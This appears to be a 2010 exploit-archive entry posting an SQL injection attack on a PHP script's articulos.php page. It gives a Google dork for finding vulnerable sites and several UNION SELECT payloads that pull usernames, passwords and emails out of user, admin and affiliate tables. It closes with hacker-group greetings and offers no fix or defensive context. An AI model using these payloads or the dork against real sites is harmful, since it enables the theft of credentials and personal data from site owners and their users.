Script (articulos.php) SQL Injection Vulnerability

2010-06-20T00:00:00
ID 1337DAY-ID-12800
Type zdt
Reporter CaSpErHaK
Modified 2010-06-20T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==================================================
Script (articulos.php) SQL Injection Vulnerability
==================================================


# Date: [20-6-2010]
# Author: [CaSpErHaK]
# Tested on: [linux]

// =============================founded By CaSpErHaK==============================
//
Hello World
//*****************
//? ................................................
// #. Dork in Google :- inurl:"articulos.php?id="? .
//? ................................................
//
// # Exploit:-?
//   http://[site]/Path/articulos.php?id={SQLi}
//  ***********************************************************
// # Poc :-
//
//?? >>>>>>??? from table #usuarios#
//
// union+select+1,2,3,concat(usuario,0x3a,contrasena),5,6,7,8,9+from+usuarios--
// (0R)
// union+select+1,2,3,4,5,concat(username,0x3a,password),7+from+usuarios--
// (0R)
// union+select+1,2,3,concat(usuario,0x3a,password),5,6,7,8,9+from+usuarios--
// (0R)
//??? UNION SELECT 1,2,concat(idusu,0x3a,Nombre_u,0x3a,Clave_u),4,+from+usuarios--
/ /********************************************************************************
//?? >>>>>>  from table #admin#
//
//  union+select+1,2,3,4,5,6,concat(uname,0x3a,passwd),8,9+from+admin--
/ /********************************************************************************
//  >>>>>>  from table #afiliados#
//
//   union+select+1,concat

(idafiliados,0x3a,nombre,0x3a,email,0x3a,password),3,4+from+afiliados--
/ /********************************************************************************
//
//
//  Greetz  To All  Muslim  Hackerz & H4ckforu? Team .........
//
//=======CaSpErHaK[at]Gmail.com========
//=======Casper_x28[at]HotMail.CoM=====




#  0day.today [2018-03-06]  #